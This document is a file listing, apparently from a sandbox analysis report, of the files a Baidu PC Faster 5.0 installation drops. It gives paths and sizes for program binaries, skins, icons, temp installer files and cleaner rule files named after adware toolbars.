%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1188.InfoAtoms.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\NetworkSpeedTester\map_BR.png (11344 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1106.GetSavin.rul (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10045.png (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\BigFileCleaner.dat (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1048.MixiDjV30.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1134.ooVoo.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Microsoft_on.png (339 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\log.dll (4992 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1068.AppBario2.rul (6 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\version.xml (294 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\DataReport.dll (12536 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10620.png (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10065.png (3 bytes)
%WinDir%\Tasks\060184C3-9766-46a0-B258-F4518A0B2633.job (918 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1152.DealCola.rul (10 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1046\tools\BigFileCleaner\BigFileCleaner.bskin (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1158.UnfriendCheck.rul (6 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0016.AutorunEater.rul (410 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10014.png (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\BHipsConfig.ini (684 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\HomeRank.dat (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\uTorrentControl.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Palm_off.png (446 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1033\ieprotect_font\ieprotect_font.bskin (486 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Optimizer\Plugin_OptimizerEx.dll (34023 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\BavPc.dll (16944 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\tools\skin_upgrade\skin_upgrade.bskin (9 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1087.MediaFinder.rul (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\GiantSavings.rul (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\logo\system\2.png (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1057\feedback\feedback.bskin (5064 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\CleanerEngine.dll (65976 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1057\update\update.bskin (12 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\ProgramFileList.xml (12536 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10095.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswBF.tmp (1437980 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Nokia_off.png (486 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\ZTE_on.png (500 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Huawei_off.png (646 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1028\feedback\feedback.bskin (5064 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Optimizer\SysOptEngine.dll (38904 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Fonts\HelveticaNeueLTPro-Th.otf (1552 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1142.KeyBar1.13.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\skin_default\skin_default.bskin (8184 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\liveupdate.exe (16424 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1028\hipspop\hipspop.bskin (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10203.png (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\NEC_off.png (463 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1076.SavingsAddon.rul (8 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\3082\update\update.bskin (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1028\tools\FasterNow\FasterNow.bskin (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\t4.db (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1033\nsis_install\nsis_install.bskin (1856 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\Ask.rul (10 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\tools\NSISInstall\NSISInstall.bskin (15168 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1152.DealCola.rul (10 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1131.SocialSearchBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\MainFrame\shadow.png (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0019.AlfaAutorunKiller.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\appbario7.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\MyWebSearch.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1057\BaiduSafe\BaiduSafe.bskin (9320 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Microsoft_off.png (341 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\WhiteSmokeToolBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\PCFasterFeedback.exe (27704 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1081.Funmoods.rul (15 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1128.EasyTVBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1172.AskPartnerNetwork.rul (1552 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0012.TheWeatherChannelApp.rul (731 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Google_off.png (637 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1063.SnapDo.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1046\BugReporter\BugReporter.bskin (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Updater.exe (37025 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\weather\big\lightning.png (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\3082\lang.ini (100 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1102.FastFreeConverter.rul (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\tools\common\common.bskin (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\CrashReport.exe (25776 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\MEIZU_on.png (367 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1054\feedback\feedback.bskin (5064 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1028\tools\BigFileCleaner\BigFileCleaner.bskin (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\MainFrame\tool_box.png (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1144.WiseConvertB2.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1028\popups\popups.bskin (3312 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\weather\big\cloud.png (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1063.SnapDo.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1148.KeyBar1.8.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1115.Qwiklinx.rul (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10023.png (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\DafaultPhone_off.png (405 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\skin_boottime\skin_boottime.bskin (23296 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1107.TVGenie.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10063.png (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\3082\feedback\feedback.bskin (5064 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1049.SocialSearchBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1148.KeyBar1.8.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1057\confirm\confirm.bskin (2392 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\Tuvaro.rul (6 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\NetworkSpeedTester\download_light.png (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1088.yontooToolbar.rul (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1033\popups\popups.bskin (3312 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\webcake.rul (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1143.BrowserPlus2.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\BrowserProtect.rul (101 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1145.FreeSoundRecorder.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1074.CodecPerformer.rul (6 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1057\popups\popups.bskin (3616 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\Yontoo.rul (5 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1116.NewVeoh.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1057\ieprotect\ieprotect.bskin (15 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10230.png (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1180.TNT2-ide.rul (5 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10149.png (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1054\BaiduSafe\BaiduSafe.bskin (8560 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\NetworkSpeedTester\map_EG.png (30344 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1049.SocialSearchBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1085.facesmooch.rul (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1178.IminentToolbar.rul (1552 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\WhiteSmokeToolBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\Aflamster.rul (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1054\confirm\confirm.bskin (3312 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1145.FreeSoundRecorder.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1064.Webblog.rul (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\FasterNow\memory_circle.png (9 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\dynamic\WorldCup\server.txt (85 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\Communication.dll (11048 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0021.MP3Rocket.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\BProtectEx.sys (3616 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1058.ScenicReflections.rul (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\Genieo.rul (6 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1033\lang.ini (100 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0003.VuuPC.rul (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0010.Martview.rul (10 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1046\ieprotect_font\ieprotect_font.bskin (486 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10531.png (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\NetworkSpeedTester\bk_downloading.png (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\loading.png (5 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0025.SpeedBitVideoDownloader.rul (14 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1094.BittorrentBar_DEToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1146.BrotherSoftExtremeToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1162.TidyNetwork.rul (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Optimizer\SysOpt\optlist.dat (46278 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1112.SaveValet.rul (465 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\CrashUL.exe (11048 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1140.BroderbundBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update.dll (34561 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\tools\skin_feedback\skin_feedback.bskin (3616 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Facebook\Plugin_Facebook.dll (12536 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1046\ieprotect\ieprotect.bskin (11 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\Tuvaro.rul (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\url.ini (9 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Samsung_on.png (603 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\VidSaver.rul (6 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1033\ieprotect\ieprotect.bskin (13 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\11248.png (3 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Baidu PC Faster\Baidu PC Faster.lnk (974 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\PCFHelper.exe (26688 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\FasterNow\fast_big_outer_circel.png (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1097.NCH FRToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1033\tools\BigFileCleaner\BigFileCleaner.bskin (1 bytes)
%Documents and Settings%\All Users\Application Data\Baidu Security\PC Faster\RpData\rpFile-Baidu_Secure_SystemUp_5.0.4.87531-2014-12-20 12-34-14-0404-[8244].tmp (1286 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\ShoppingSidekick.rul (8 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Lenovo_off.png (551 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1132.SerifBar.rul (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1033\confirm\confirm.bskin (2392 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\log64.dll (4992 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\BrowserProtect.rul (101 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\RebateInformer.rul (6 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.HomeEx\res\res.bskin (15168 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\CouponDropDown.rul (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\apple_off.png (536 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1054\tools\BigFileCleaner\BigFileCleaner.bskin (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\fn.dat (1552 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Philips_off.png (439 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1046\popups\popups.bskin (3616 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1046\update\update.bskin (13 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\DeepClean.exe (46278 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1147.EntrustedToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1052.TigerSavings.rul (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1151.NinjaSavings.rul (11 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0031.KCSoftwaresSUMo.rul (560 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1105.FreeYoutubeDownload.rul (14 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1104.SavepathDeals.rul (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Yulong_on.png (616 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10174.png (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\3082\tools\FasterNow\FasterNow.bskin (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\11355.png (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Plugin_Cleaner.dll (35784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1054\NewFeatures\NewFeatures.bskin (9320 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\skin_ieprotect\skin_ieprotect.bskin (13 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1054\PcfTray\PcfTray.bskin (2392 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\VDownloader_Ask.rul (8 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1093.BittorrentBar_FRToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\Genieo.rul (6 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1028\ieprotect_font\ieprotect_font.bskin (488 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\skin_frame\skin_frame.bskin (6360 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\GameFaster\restore_mask.png (798 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\GiantSavings.rul (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\LG_off.png (596 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\tools\DeepClean\res\res.bskin (12536 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1057\tools\FasterNow\FasterNow.bskin (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\BHips.dll (22192 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1164.RecordChecker.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\NetworkSpeedTester\upload_light.png (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1046\tools\FasterNow\FasterNow.bskin (1 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Baidu PC Faster\Feedback.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\InstallUtility.log (256186 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\weather\small\cloud.png (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1137.TVersityBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\FasterNow\memory_circle_point.png (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Motorola_on.png (577 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\HTC_on.png (497 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Lenovo_on.png (603 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1097.NCH FRToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\MEIZU_off.png (375 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1106.GetSavin.rul (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\logo\system\10.png (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1086.DownloadEnergyToolbar.rul (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1083.PriceGong.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\weather\small\foggy.png (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\3082\ieprotect\ieprotect.bskin (1552 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1114.ST-Eng7.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1129.HamInfoBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1118.A2ZLyrics.rul (8 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1098.NewYorkYankeesToolbar.rul (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1166.SpyAlert.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1093.BittorrentBar_FRToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1137.TVersityBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1033\NewFeatures\NewFeatures.bskin (9320 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\BrowserDefender.rul.bak (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Alcatel_on.png (565 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\BlackBerry_off.png (440 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1054\screensnpashot\screensnpashot.bskin (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\log.dll (4992 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1028\common\common.bskin (389 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1054.CouponCaddy.rul (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\Yontoo.rul (5 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1110.BrowseForTheCause.rul (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1107.TVGenie.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\Deal Spy.rul (8 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1057\ieprotect_font\ieprotect_font.bskin (486 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\Inbox.rul (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1090.DVDVideoSoftToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1058.ScenicReflections.rul (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\logo\system\9.png (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\NetworkSpeedTester\upload_circle.png (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1033\screensnpashot\screensnpashot.bskin (956 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1105.FreeYoutubeDownload.rul (14 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1111.Vuze.rul (784 bytes)
